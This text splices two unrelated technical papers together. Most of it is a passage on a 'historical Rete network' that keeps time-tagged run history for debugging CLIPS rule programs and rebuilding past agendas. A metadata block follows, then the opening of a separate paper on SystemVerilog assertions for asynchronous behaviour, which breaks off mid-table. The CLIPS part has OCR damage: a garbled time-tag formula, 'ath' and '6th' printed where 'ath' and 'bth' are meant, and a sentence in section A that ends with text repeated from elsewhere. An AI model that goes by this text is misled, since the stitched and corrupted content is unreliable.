Table 2. Rules for Historical Rete Example
Figure 2 shows a historical Rete network as it would be right before time 4 for the initial facts given and for the rules in Table 2. Following the chronology shown in Figure 2, one can see how the facts propagate through the historical Rete network, how the time-tags are set, and how instantiations come and go (and move from current to past partitions). As shown, the instantiation of rule-2 matching facts (r 4 6) and (s 2 4) will be the next to fire, at time 4. The action is basically the same as a classical Rete network, but now one can see such historical details as, for example, why rule-1 could not fire at time 3: because it had no true instantiations then.
Conceptually, a historical Rete network will look like figure 2; however, for performance reasons, we will likely implement it slightly differently; for example, we will very likely incorporate hashing into it. Hashing has been proposed for Rete networks to improve performance (for example, in (Gupta et al. 1988)); it will be useful for historical Rete networks as well. In particular, past partitions of nodes should be hashed, so that a particular past partition entry can be found in constant time (in the average case).
When a fact is asserted into a historical Rete network at time counter value \( t \), it has the time-tag \( (t \ast) \) added to its wme hash table entry and also to any new instantiations resulting from its propagation through the historical Rete network. The propagation through the historical Rete network is essentially the same as for a "classical" Rete network, except that
(a) each new instantiation that results is placed in the corresponding memory node's current partition (instead of in its 'only' partition, in the normal case),
(b) beta tests are performed for instantiations in current partitions (but these current partitions contain the same instantiations as the 'only' partitions in the normal case), and
(c) (as already mentioned) each instantiation that results from asserting this fact has the time-tag interval \( t^* \) appended to it.
\[
\begin{align*}
&\text{time 0:} \\
&(\text{initialise working memory}) \\
&\text{assert } (p\ 1\ 3) \\
&\text{assert } (p\ 7\ 9) \\
&\text{assert } (r\ 4\ 6) \\
&\text{assert } (r\ 1\ 3) \\
&\text{assert } (s\ 2\ 4) \\
&\text{assert } (s\ 5\ 1) \\
&\text{time 1:} \\
&\text{FIRE rule-2 } (r\ 1\ 3)(s\ 5\ 1) \\
&\text{ASSERT } (q\ 3\ 5) \\
&\text{time 2:} \\
&\text{FIRE rule-1 } (p\ 1\ 3)(q\ 3\ 5)(r\ 1\ 3) \\
&\text{ASSERT } (r\ 1\ 5) \\
&\text{RETRACT } (p\ 1\ 3) \\
&\text{time 3:} \\
&\text{FIRE rule-2 } (r\ 1\ 5)(s\ 5\ 1) \\
&\text{ASSERT } (q\ 5\ 5)
\end{align*}
\]
Figure 2. A Historical Rete Network
When asserting a fact, the computational cost of keeping historical information is quite low. The computations for deciding if an instantiation has to be propagated are still the same as in the original network. The only additional computational overhead comes from adding the time-tag intervals to each fact and instantiation, and from updating any node hash tables being used as necessary.
Retracting a fact from the historical Rete network at time counter value \( t \) has a few
additional differences compared to its "classical" Rete counterpart. In a "classical" Rete network, the wme hash table entry for the fact to be retracted is found, and the pointers within this entry to every alpha node matching this fact are traversed in turn. From each alpha node matching this fact, we remove any instantiations making use of the retracted fact, and then continue to all the nodes reachable from this alpha node, searching for, and removing if found, any instantiations using the fact being retracted. When done with all of that, the fact's wme hash table entry is deleted.
In a historical Rete network, the process is basically the same — we find the fact's wme hash table entry, follow its pointers to the alpha nodes matching this fact, and search from each of these alpha nodes for all of the instantiations using this fact. Where we searched all the instantiations in the "only" partition of each encountered memory node in the "classical" case, now we search only the instantiations in the current partition (which has the same collection of instantiations as the classical Rete network's only partition, for each memory node). Instead of deleting those instantiations that make use of the fact being retracted, we move them from the current partition to the past partition of their memory nodes, and close the open interval in their time-tags with the current time-counter value. (For example, if the open interval was \((a \ast)\), and the current time counter value is \(t\), then the time-tag interval becomes \((a t)\).) Finally, when done with all that, instead of removing the wme hash table entry, we merely close the open interval in its time-tag with \(t\).
Comparing retraction in the historical and regular cases, most of the differences are minor: the entry is removed from the wme hash table in the regular case, but just has its open time-tag interval closed in the historical case, and each instantiation using the retracted fact is deleted from the network in the regular case, but is moved from the current to the past partition of its memory node in the historical case, with its time-tag also closed with the current time counter value. However, there is a bit more work than might be apparent in moving an instantiation from the current to the past partition. To keep things most straightforward if an instantiation is true for more than one period of time (for example, if a rule contains a negated condition that is true, then false, then true again), we would like to keep no more than one entry per instantiation in a memory node's past partition; this will require a search of the past partition. If a previous instance of this instantiation is found, we append the newly closed time-tag to it, and if not, then we add a new entry with the instantiation and its newly closed time-tag. Fortunately, if we hash the past partitions, then this search will take constant time, in the average case.
Here is a simple example, to demonstrate the use of partitions. Let \(i\) be an instantiation that was true between times \(a\) and \(b\) and between times \(c\) and \(d\). When it became true at time \(a\), its time-tag was \((a \ast)\), and it clearly belonged in the current partition of the appropriate memory node. When it became no longer true at time \(b\), its interval was closed, resulting in the time-tag \((a b)\), and \(i\) was removed from its memory node's current partition and moved into its past partition. At time \(c\), it became true again.
There are a number of possibilities about how to proceed; we will leave the past instance of this instantiation in the past partition and create a current instantiation in the current partition. Keeping two copies of an instantiation when it is true and has been false in the past, one in each partition, simplifies run-time operation of the historical Rete network. It allows us to assume that instantiations in current partitions have exactly one interval, which is known to be open, in their time-tags. It also lets us avoid accessing the past partition when adding an instantiation. However, as mentioned, the past partitions will be accessed when instantiations are removed from current partitions, so that the newly-closed time-tag can be appended to an existing entry, if one exists. That way, each instantiation has at most one entry in its memory node's past partition, whose time-tag includes all of the time periods that this instantiation was true, instead of having a past partition entry for each interval that the instantiation was true.
So, assuming that \(i\) is the only instantiation in its memory node, then after time \(b\) and before time \(c\) the memory node's partitions are as shown in Table 3:
Table 3. After time b, before time c
Now, when t becomes true again at time c, the past instance of the instantiation will be in the past partition, and the current instance will be in the current partition, as shown in Table 4:
Table 4. After time c, before time d
Finally, when t becomes false again at time d, then the current instance is removed from the current partition, and the now-closed time interval is added to the existing past partition entry's time-tag, as shown in Table 5:
Table 5. After time d
These preliminary intuitions suggest that the addition of time-tags and current and past partitions does not fatally increase the overhead of asserting facts to and retracting facts from the historical Rete network. They also suggest that we will meet our goal of keeping the run-time operation of the historical Rete network reasonably close to that of the original version, while still allowing historical information to be maintained within. The major cost will be the storage of the historical information.
III. AGENDA RECONSTRUCTION
Since the agenda determines which rule fires next, its changing contents and their order are part of a run's historical information. And, for answering certain debugging-related questions, the agenda's state at a particular time will, indeed, be needed. For example, consider the question "Why did rule X not fire at time T?". Using the historical information in the historical Rete network, we can find out, from rule X's production node, if any instantiations of rule X were true — and thus eligible to fire — at time T (Any rule instantiation whose time-tag has an interval containing T was eligible at time T.) However, once we find that it was true then, we need the agenda from that time to obtain further details about why rule X did not fire. For example, with the agenda, we can see how many other rule instantiations were above rule X's highest instantiation. Such details may make it easier to determine what would be needed for rule X to fire at time T.
Since past states of the agenda may be useful in debugging a CLIPS program, we need to determine how to handle agenda history. We would like to avoid storing a copy of the agenda for every value of the time counter, because the potentially large number of instantiations in common between 'consecutive' agenda copies makes this seem like a poor use of space. It seems preferable to store enough information to reconstruct an agenda copy when desired. This reconstructed copy could be used by an explanation system to answer
questions, could be printed for direct system builder use, or could be modified to answer follow-up questions. Furthermore, the information used to reconstruct the agenda may also be useful for other purposes, perhaps more conveniently than if it were in the form of literal agenda copies.
Our current plan is to use information stored with only moderate redundancy to reconstruct the agenda at a particular time reasonably quickly. The needed information will be stored in an agenda-changes list, containing a chronological list of all changes made to the agenda during a program run. Three kinds of changes are possible: a rule instantiation can be added (an ADD), a rule instantiation can be removed to be fired (a DEL/FIRE), and a rule instantiation can be removed because at least one of the rule's LHS conditions is no longer satisfied by working memory (a DEL/REMOVE). Each change also includes the time of that change, even though the list is ordered, for easy searching for changes from a particular time period. And, finally, each agenda-changes entry also contains some representation of the instantiation being added, deleted/fired, or deleted/removed. Notice that, for any single time counter value, there will be exactly one DEL/FIRE entry, and zero or more DEL/REMOVE's and ADD's.
To construct a copy of the agenda as it was at time counter value T, we basically search the agenda-changes list entries from time 0 to time T. Then, for each ADD, we see if it was still on the agenda at time T, and if so, we add it to the agenda copy being constructed. We must start at the beginning of the agenda-changes list each time because a very-low-priority rule may be instantiated from the very beginning of a run, but not fired for a very long time because other rules always take priority. However, we can, of course, safely ignore all changes made to the agenda after time T.
To see if an ADD'ed instantiation from the agenda-changes list was removed from the agenda before time T, we think the best approach will be to search for the instantiation's entry in the past partition of its rule's production node. With hashed past partitions, this should normally take constant time. If found, then we find the time-tag interval beginning with the time of this ADD (after all, this rule instantiation was added to the agenda at this time because it had become eligible). If this interval was closed before time T, then this instantiation was not on the agenda at time T, and we do not need to add it to our agenda copy. Otherwise, it was still eligible then, and we should add it. (If the instantiation is not found in the past partition, then it is in the current partition, in which case, being still true currently, it also was true at time T, and should be added to the agenda copy. Notice, however, that this can only occur if an agenda copy is being constructed during a run, for example while single-stepping through it.)
Using the production node in this way should take less time than other alternatives, which involve possibly time-consuming searches of other, non-hashed data structures. For example, we could add every ADD'ed instantiation encountered to the agenda copy, and then could remove any that left before time T as we come to their DEL/FIRE's or DEL/REMOVE's. However, that would involve a search of the agenda copy every time that an instantiation had to be removed. Similarly, for each ADD'ed instantiation, we could search down the agenda-changes list to see if it has a DEL/FIRE or DEL/REMOVE before time T; but, this would involve searching down the agenda-changes list for each ADD'ed instantiation.
A pleasant advantage to handling the ADD's in chronological order is that they can be added to the agenda copy using the same means that the system adds instantiations to the agenda during run-time, using CLIPS' conflict resolution strategy. For each ADD'ed instantiation that was still on the agenda at time T, we start at the top of the agenda copy, and compare the salience of the 'new' instantiation to that of each of the instantiations on the copy in turn, until reaching one whose salience is the same as or less than the 'new' instantiation's salience. The 'new' instantiation will be placed directly above that instantiation. We can safely stop searching down the copy after reaching one with the same salience because, since we are handling the ADD's in chronological order, recency dictates that this new instantiation, joining the agenda later than any of those already in the copy,
should go on top of those with the same salience.
Here is a simple example of agenda reconstruction. We have an agenda-changes list as shown on the left in Figure 3, in which we use letters to represent rule instantiations. To make the figure easier to read, current and past partitions are not indicated. Assume that the saliences of the instantiated rules labelled by A, B, C, F, and G are all zero, and that those of D and E are 1.

Agenda-changes list:
<table>
<thead>
<tr>
<th>Time</th>
<th>Action</th>
<th>Rule</th>
</tr>
</thead>
<tbody>
<tr>
<td>0</td>
<td>ADD</td>
<td>A</td>
</tr>
<tr>
<td>0</td>
<td>ADD</td>
<td>B</td>
</tr>
<tr>
<td>0</td>
<td>ADD</td>
<td>C</td>
</tr>
<tr>
<td>1</td>
<td>DEL/FIRE</td>
<td>C</td>
</tr>
<tr>
<td>1</td>
<td>ADD</td>
<td>D</td>
</tr>
<tr>
<td>1</td>
<td>DEL/REMOVE</td>
<td>A</td>
</tr>
<tr>
<td>2</td>
<td>ADD</td>
<td>E</td>
</tr>
<tr>
<td>3</td>
<td>ADD</td>
<td>F</td>
</tr>
<tr>
<td>4</td>
<td>ADD</td>
<td>G</td>
</tr>
<tr>
<td>5</td>
<td>DEL/FIRE</td>
<td>G</td>
</tr>
</tbody>
</table>
Production Nodes from Historical Rete Network:
1. A, time-tag: (0 1)
2. B, time-tag: (0 *)
3. C, time-tag: (0 1)
4. D, time-tag: (1 3)
5. E, time-tag: (1 2)
6. F, time-tag: (3 *)
7. G, time-tag: (3 4)
To reconstruct the agenda from right before time 2, before E fired, we start at the top of the agenda-changes list; the first entry is the addition of A. We check its entry in its rule's production node, and see that it was removed from the agenda at time 1, and so does not belong in the copy. The next entry is the addition of B at time 0. B does not have a past partition instance at this time, as it is still on the agenda, and so it was also on the agenda at time 2; B becomes the first instantiation in the copy.
C is also added at time 0, but is removed — by being fired — at time 1, so it is not put on the copy. Since the next entry is a DEL/FIRE, we go on to the entry after that, the addition of D. D is not removed until time 3, so it belongs on the copy. D's rule's salience of 1 is greater than B's, which is 0, so D is placed on top of B, as shown in Table 6:
<table>
<thead>
<tr>
<th>Rule</th>
<th>Salience</th>
</tr>
</thead>
<tbody>
<tr>
<td>D</td>
<td>1</td>
</tr>
<tr>
<td>B</td>
<td>0</td>
</tr>
</tbody>
</table>
Table 6. D added to agenda copy
The next entry is ignored, since it is a DEL/REMOVE. For the next, E should be in the copy, since it is still on the agenda at time 2; its salience is the same as D's, but E is more recent, and so E goes on top of D, as shown in Table 7. The next entry occurred at time 2, and so, since we want the copy to be as the agenda was right before time 2, we stop now. The final agenda copy is the one shown in Table 7. If one writes out the agenda from time 0 onward, adding and deleting as specified, one sees that this is, indeed, the state of
the agenda as it was right before time 2.
<table>
<thead>
<tr>
<th></th>
<th>salience:</th>
</tr>
</thead>
<tbody>
<tr>
<td>E</td>
<td>1</td>
</tr>
<tr>
<td>D</td>
<td>1</td>
</tr>
<tr>
<td>B</td>
<td>0</td>
</tr>
</tbody>
</table>
Table 7. E added to agenda copy
One might question why the DEL/FIRE's and DEL/REMOVE's are kept in the agenda-changes list at all, since they are ignored during agenda reconstruction. They are worth keeping for when the states of the agenda over a period of time are desired. To observe the agenda between times T and U, having DEL/FIRE's and DEL/REMOVE's in the agenda-changes list keeps the system from having to reconstruct an agenda copy for time T, to then completely reconstruct another for time (T + 1), and so on through time U, starting over at the beginning of the agenda-changes list each time. With the DEL/FIRE's and DEL/REMOVE's, the system can instead reconstruct the agenda for time T, then apply each of time (T + 1)’s agenda-changes list entries to the copy, resulting in time (T + 1)’s agenda, and so on to time U, updating the previous time value’s copy instead of completely rebuilding it each time. Similarly, the DEL/FIRE’s and DEL/REMOVE’s allow us to show what happened to the agenda, and in what order, during a single value of the time counter, if that is desired by the system builder.
IV. USING THE HISTORICAL RETE NETWORK TO ANSWER QUESTIONS FOR DEBUGGING
We will now consider how a CLIPS program run’s historical Rete network and associated data structures can be used by an explanation subsystem in answering several types of questions useful for debugging. We will not discuss all the aspects involved in answering these questions, but will instead concentrate on which historical data should be collected for use in eventually answering them, and how to obtain this information.
A. When was fact F in working memory?
This question is very simple to answer using the stored historical information, and is also very useful for debugging. For example, if F is a control fact, asserted to indicate that the program has identified a particular sub-situation, then knowing when F was in working memory lets the system builders know when that sub-situation was considered during the run, if ever. If a discovered fault involves F, then knowing when F was in working memory lets the system builders concentrate on which historical data should be collected for use in eventually answering them, and how to obtain this information.
To find out when fact F was in working memory is even easier than finding out what rule (probably) asserted it, since we plan to include time-tags in the wme hash table. All we need to do is access fact F's wme hash table entry, and copy the time-tag from that entry (and probably the corresponding fact-id(s) as well). For example, if F's time-tag is (a b)(c d), then F was in working memory from the ath rule firing to the 6th rule firing, and then again from the cth rule firing to the dth rule firing. Since CLIPS associates a different fact-id with
each new assertion of a fact (following a retraction), it would also be potentially useful to
the system builders to include with each time period the fact-id assigned to the fact during
that period.
There is also the possibility of giving the system builders the time periods in a form
other than the relative rule-firings; for example, the time-periods could be expressed as the
actual rule instantiations that fired, or as the actions that were done. However, whether this
would be better for debugging, how such an answer can be expressed clearly, and how the
system builders can perhaps be allowed to specify dynamically which they would prefer, are
still open questions.
B. What facts matched LHS condition \( L \), and when?
This question could be useful for debugging when the system builder is interested in strange
program behavior related to a particular LHS condition. If the system builder considers
this condition to be key to one or more rules' firing, then knowing what satisfied it, and
when, may shed light on why rules containing this LHS condition did or did not fire. The
facts which satisfied \( L \), and when each was in working memory, can be used in subsequent
questions; and, if \( L \) was never satisfied, then that in itself may reveal to the system builders
why certain actions were not performed by the program.
Given the historical Rete network, answering this question will be easy, as long as \( L \)
is indeed a LHS condition in one of the rules. We access this LHS condition's alpha node
within the historical Rete network; each instantiation stored in that alpha memory, whether
in the present or past partition, corresponds to one fact that matched \( L \). Moreover, each
instantiation contains the time-tag giving when that fact matched \( L \). So, this alpha node's
contents constitute the data for answering this question.
C. What fired rule instantiations' LHS's included fact \( F \)?
This question allows system builders to easily find out which rule firings actually made use
of a particular fact. For example, this could reveal, if \( F \) should not have been in working
memory, just how much "damage" it caused, in terms of instantiations firing that should not
have fired. The answer to this question can also make visible some of the effects of a previous
instantiation firing: if one fired instantiation asserts fact \( F \), and the system builders want to
see if that action directly contributed to other actions, then the answer to this question gives
them that information. And, if \( F \) is a control fact, inserted specifically to control what rule
is to fire in a particular scenario, then if the answer to this question is that no rule fired using
this fact, that could indicate to the system builders (1) that the fact was never in working
memory, or (2) that the rules had an error (for example, a typo, or a missing field) in the
condition that was supposed to correspond to that fact, or even (3) that the rules that were
supposed to assert \( F \) did not do so, or asserted it incorrectly.
Although not directly requested, the answer should include the time periods that
this fact was in working memory. This might be useful, because the system builders might
notice, for example, that during one period the fact contributed to several rules' firing, and
in another it did not. We should also include the time of firing of each rule instantiation
that used this fact: this lets the system builders know when in the run this particular fact
played a role, and it gives them the time information in case they want to follow up this
question with one about why a certain rule instantiation did or did not fire at one of those
time values. And, if the system builders choose to single-step through the run again, they
know which rule-firings to pay particular attention to.
To collect the information for answering this question, we start at the wme hash table
entry for fact \( F \), and copy the time periods that \( F \) was in working memory. Then, using the
hash table entry's pointers to all alpha nodes matching this fact, we travel in turn to each
such alpha node.
From each alpha node that matches \( F \), we travel to all of the production nodes
reachable from that alpha node. (An alpha node may lead to more than one production node because, as stated earlier, if a LHS condition is used in more than one rule, its alpha node is shared in the historical Rete network.) At each of these production nodes, we search its past partition for instantiations containing \( F \). Each found is a rule instantiation that used \( F \), and is no longer eligible — now, we need to see if it actually fired. After all, it may have left the agenda because one of its LHS conditions became unsatisfied before it could fire. We check every time value that it left the agenda — for example, if its time-tag is \( (t \{ t\{w \{ x\}) \) then it left the agenda at times \( t \) and \( x \) — and see if the rule instantiation that fired at that time is, indeed, this instantiation. If so, then we have found an instantiation that fired, and that used \( F \), and so it should be added to the list-in-progress of instantiations to be included in the answer. We continue in this way until we have checked all the past partition instantiations in production nodes reachable from alpha nodes for LHS conditions matching \( F \). At that point, we have collected all of the fired rule instantiations that included fact \( F \), and we can present them to the system builder in some reasonable form.
D. Why did rule \( X \) not fire at time \( T \)?
This type of question has the potential to be particularly useful for the purpose of debugging. Once system builders notice that a rule that they thought should fire at a particular time did not, having this question available — even with only low-level suggestions for what caused the “error” — could save them much tedium in terms of single-stepping through a run to the time of interest, poring over a long trace of rule firings, and/or adding print statements to particular rules. Knowing why a rule did not fire may lead directly to an error that kept a rule from firing, or it may indicate gaps in the system’s rules (or data). If a particular unsatisfied LHS condition kept it from firing, then the system builders might immediately notice any obvious typos as soon as they are shown that condition. Or, the condition might cause the system builders to think of a fact that they thought was true, and that should have satisfied this condition; that might suggest what question they should ask next. (For example, they might ask what rules have RHS actions that could have asserted that particular fact. This follow-up question does not involve historical information about the run, but it is useful in this particular scenario. Historical information would come into play again with the likely-follow up to that question: why the rules that could have asserted that fact did not themselves fire.) If, on the other hand, the rule was eligible to fire at time \( T \), but another fired instead, then knowing the relative saliences of the fired rule and rule \( X \) might give the system builders clues that salience-adjusting is needed, or might point out a rule (or rules) that should not have been eligible at time \( T \), but were.
Again focusing on what historical data should be collected and how it can be obtained, we first reiterate the two basic reasons for a rule not firing: either its LHS was not satisfied, or it was eligible to fire, but was not on top of the agenda. To find out which of these is the case, we start by going to rule \( X \)’s production node in the historical Rete network. We check the time-tags of all of the instantiations in this production node, in both the current and past partitions, and see which, if any, contain intervals including \( T \). Each such instantiation was eligible to fire at time \( T \), and we should add it to a list of instantiations of rule \( X \) that were eligible to fire at that time.
When we are done checking all of rule \( X \)’s production node’s instantiations, the list of eligible instantiations built will determine what we do next. If this list is empty, then rule \( X \) did not fire because it was not eligible to fire at that time; we should next determine what LHS conditions were not satisfied then. If this list is not empty, then rule \( X \) did not fire because none of its instantiations were on top of the agenda right before time \( T \); we should next determine, in this case, why other instantiation(s) preceded rule \( X \)’s instantiations on the agenda.
If the rule was not eligible to fire at time \( T \), we will traverse the historical Rete network backwards from rule \( X \)’s production node, searching the nodes corresponding to rule \( X \)’s LHS conditions. These alpha and beta memory nodes will be searched for instantiations...
current at time $T$: both current and past partitions of each node will be searched, and each instantiation's time-tag will be checked to see if $T$ lies within any of its intervals.
If a beta node is found to have no instantiations that were true at time $T$, then the corresponding inter-condition test was not satisfied then. Likewise, if an alpha node is found to have no instantiations that were true at that time, then no fact matched this LHS condition then. Eventually, in this way, we build a list of unsatisfied LHS conditions and inter-condition tests, and this list will be used in constructing the answer, so that the system builders will know which conditions of rule $X$ were not satisfied at time $T$; these need to be satisfied, if rule $X$ is to even be eligible to fire then.
In the case that the rule was eligible to fire at time $T$, we could simply report what rule instantiation did fire then; however, that would not give such potentially-useful information as, for example, just where in the agenda rule $X$’s instantiations were at time $T$. We can gather additional details in the following way. First, we reconstruct a copy of the agenda from right before time $T$, using the already-discussed agenda reconstruction algorithm. Then, we search down the agenda copy from the top to find out how far down the agenda the highest instantiation of rule $X$ was, and also how many of the instantiations above rule $X$’s highest one had higher saliences; such instantiations will always be chosen to fire before rule $X$’s, if all are on the agenda concurrently. The remainder of the instantiations above rule $X$’s highest one are there because they joined the agenda more recently — for rule $X$ to fire before these, those rules will have to be instantiated earlier, or rule $X$ will have to be instantiated later. If there are too many instantiations above rule $X$’s to readable present them all to the system builders, then we can still at least tell them how many were above it, and how many of those had higher salience; and we should include the instantiation on the agenda top, and its salience, in any case.
In these examples, the historical information in the historical Rete network and associated data structures makes obtaining specific details about a run straightforward and reasonable. This will help a great deal in developing a practical system for answering questions such as the above. Storing historical information within the network makes it easy to update as the run proceeds, and leaves it where it can be easily obtained for different kinds of debugging purposes — such as different kinds of questions — after the run concludes. With the system able to answer such questions, the system builder will be able to easily obtain historical information about a run.
V. CONCLUSIONS AND FUTURE WORK
We have proposed that historical information about a run of a CLIPS program be stored within a historical Rete network used to match CLIPS rules' LHS's to working memory facts. This paper has explained how a Rete network can be modified for this purpose, and how the historical information thus stored can subsequently be used by a question-answering system to be designed to help with debugging a CLIPS program.
It should be feasible to store and maintain this historical information without degrading CLIPS run-time performance too badly. In fact, it is noteworthy that it can be integrated so easily into the Rete network. The basic Rete propagation is almost unchanged; the only additions involve peripheral actions such as appending time-tags, and moving no-longer-true instantiations from current to past partitions. Using hashing in various places, the time to perform these additional duties should be quite reasonable. Keeping an agenda-changes list as well will also allow reasonable agenda reconstruction whenever the system builder (or question-answering system) needs a past agenda state.
Maintaining this information is a necessary first step for providing explanation to help with debugging CLIPS, since CLIPS, being a forward-chaining language, requires temporal information to determine why a program behaved as it did. Such explanation will reduce the tedium for system builders, reducing the time they must spend examining system traces or single-stepping through a program to find out if or when something occurred.
Future work will include actually implementing these ideas, to see if integrating this information into the Rete network works as well in practice as it appears that it should in principle. Such investigation may also reveal ways to reduce the space needed to store historical data. Then, we will build the question-answering system described, on the top-level of CLIPS. We will determine what types of questions are useful for debugging CLIPS programs, and will design a system that can answer such questions, using the historical information stored in the historical Rete network and associated data structures. Empirical experiments will also be needed for evaluating the effectiveness of the resulting explanations in helping with debugging. Both debugging and testing require knowledge of what has occurred during a program run — therefore, additional future work may also include using this stored historical information in the development of further testing and debugging tools for CLIPS programs. As the size of CLIPS programs increases, such software engineering tools will become more and more necessary. These methods for maintaining and storing run history, and the explanation that they will facilitate, should help in developing these future CLIPS programs.
REFERENCES
|
{"Source-Url": "https://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/19920007373.pdf", "len_cl100k_base": 12584, "olmocr-version": "0.1.53", "pdf-total-pages": 16, "total-fallback-pages": 0, "total-input-tokens": 38442, "total-output-tokens": 13823, "length": "2e13", "weborganizer": {"__label__adult": 0.00024056434631347656, "__label__art_design": 0.00027751922607421875, "__label__crime_law": 0.00020170211791992188, "__label__education_jobs": 0.0005230903625488281, "__label__entertainment": 5.894899368286133e-05, "__label__fashion_beauty": 0.00011533498764038086, "__label__finance_business": 0.00019466876983642575, "__label__food_dining": 0.0002267360687255859, "__label__games": 0.00054168701171875, "__label__hardware": 0.0009241104125976562, "__label__health": 0.0002639293670654297, "__label__history": 0.0001976490020751953, "__label__home_hobbies": 7.933378219604492e-05, "__label__industrial": 0.00033211708068847656, "__label__literature": 0.0002440214157104492, "__label__politics": 0.0001863241195678711, "__label__religion": 0.00034546852111816406, "__label__science_tech": 0.02392578125, "__label__social_life": 6.091594696044922e-05, "__label__software": 0.010955810546875, "__label__software_dev": 0.95947265625, "__label__sports_fitness": 0.0001894235610961914, "__label__transportation": 0.0003528594970703125, "__label__travel": 0.0001456737518310547}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 57955, 0.02386]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 57955, 0.68312]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 57955, 0.94822]], "google_gemma-3-12b-it_contains_pii": [[0, 3318, false], [3318, 8130, null], [8130, 12498, null], [12498, 14872, null], [14872, 19208, null], [19208, 22422, null], [22422, 23999, null], [23999, 28731, null], [28731, 31279, null], [31279, 35813, null], [35813, 38366, null], [38366, 41316, null], [41316, 45547, null], [45547, 50279, null], [50279, 54662, null], [54662, 57955, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3318, true], [3318, 8130, null], [8130, 12498, null], [12498, 14872, null], [14872, 19208, null], [19208, 22422, null], [22422, 23999, null], [23999, 28731, null], [28731, 31279, null], [31279, 35813, null], [35813, 38366, null], [38366, 41316, null], [41316, 45547, null], [45547, 50279, null], [50279, 54662, null], [54662, 57955, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 57955, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 57955, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 57955, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 57955, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 57955, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 57955, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 57955, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 57955, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 57955, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 57955, null]], "pdf_page_numbers": [[0, 3318, 1], [3318, 8130, 2], [8130, 12498, 3], [12498, 14872, 4], [14872, 19208, 5], [19208, 22422, 6], [22422, 23999, 7], [23999, 28731, 8], [28731, 31279, 9], [31279, 35813, 10], [35813, 38366, 11], [38366, 41316, 12], [41316, 45547, 13], [45547, 50279, 14], [50279, 54662, 15], [54662, 57955, 16]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 57955, 0.10593]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
8622a9dc5e69ae61204eaaa45a9902813eda4782
|
ABSTRACT
Most digital designs inherently possess asynchronous behaviors of some kind. While the SystemVerilog assertion (SVA) language offers some asynchronous controls like disable iff, writing concurrent assertions that accurately describe asynchronous behavior is not so straightforward. SVA properties require a clocking event, making them innately synchronous. When describing asynchronous behavior, the behavior of interest typically occurs after the asynchronous trigger appears. Unfortunately, SystemVerilog scheduling semantics make this rather difficult to check because the assertion input values are sampled before the trigger occurs. This often leads assertion writers to sampling using clocks, which may not guarantee matching and optimal checking in all cases. Alternatively, there are some simple approaches for describing asynchronous behavior using SVA that this paper explores. The SystemVerilog scheduling semantics are described along with the difficulties they pose for checking asynchronous behavior. Traditional approaches are considered such as synchronizing to a clock, but better asynchronous alternatives are suggested and practical examples provided. In addition, some practical solutions are offered for other asynchronous behaviors like asynchronous communication between clock domains or across bus interfaces. Lastly, this paper considers the various changes and additions to the recently published IEEE 1800-2009 standard, which may simplify checking asynchronous behavior.
Categories and Subject Descriptors
B.6.3 [Logic Design]: Design Aids – automatic synthesis, hardware description languages, optimization, simulation, switching theory, and verification.
General Terms
Languages, Verification.
Keywords
Assertion, asynchronous, SystemVerilog, SVA, SystemVerilog Assertions, clock domain crossing, asynchronous handshaking, delay, trigger, clock handover, scheduling semantics, simulation regions, Preponed, Active, NBA, non-blocking assignment, Observed, Reactive, expect, programs, clocking block, immediate assertions, concurrent assertions, procedural concurrent assertions, deferred assertions, checkers, multi-clock sequences, abort properties, disable, property, sequence.
1. INTRODUCTION
Asynchronous behaviors still find their way into almost every design whether it operates synchronously or not. For example, designs use asynchronous reset controls or respond to asynchronous inputs like non-maskable interrupts, enables, or other asynchronous controls. Not uncommonly, interface protocols use asynchronous handshakes, and multiple clocks in a design cause asynchronous communication between clock domains. Therefore, it is just as necessary to adequately test the asynchronous behaviors in a design as it is the synchronous ones.
SystemVerilog assertions (SVA) are an ideal choice for writing checkers given the rich temporal syntax provided by the language. However, they operate synchronously by nature because they sample relative to a sampling event (such as a clock) and because of the SVA scheduling semantics described in the IEEE 1800-2005 SystemVerilog standard[3], making SVA a little tricky to use for describing asynchronous behaviors. Asynchronous behaviors usually fall into two categories: (1) asynchronous control, and (2) asynchronous communication. SystemVerilog assertions can be used for either, but each presents its own set of challenges. In the following section, both types of asynchronous behaviors are considered along with the difficulties of describing them using SVA, and practical examples and solutions to resolve these difficulties. In section 3, the latest additions and modifications to the SystemVerilog 2009 standard[4] that aid asynchronous assertion writing are considered, followed by a brief summary of the recommended practices and solutions presented in this paper.
2. ASYNCHRONOUS BEHAVIORS
2.1 Asynchronous controls
The most common form of asynchronous behavior found in nearly every design is asynchronous control. For purposes of discussion, consider the following up-down counter example:
```verilog
module Counter (input Clock, Reset, Enable, Load, UpDn,
input [7:0] Data,
output logic [7:0] Q);
always @(posedge Reset or posedge Clock)
if (Reset)
Q <= 0;
else
```
```verilog
```
```verilog
```
if (Enable)
if (Load)
Q <= Data;
else
if (UpDn)
Q <= Q + 1;
else
Q <= Q - 1;
endmodule
As one might expect, this counter has an asynchronous reset to initialize the module upon power-up or system reset. The counter's behavior is defined in Table 1.
<table>
<thead>
<tr>
<th>Reset</th>
<th>Clock</th>
<th>Enable</th>
<th>Load</th>
<th>UpDn</th>
<th>Data</th>
<th>next Q</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>-</td>
<td>-</td>
<td>-</td>
<td>-</td>
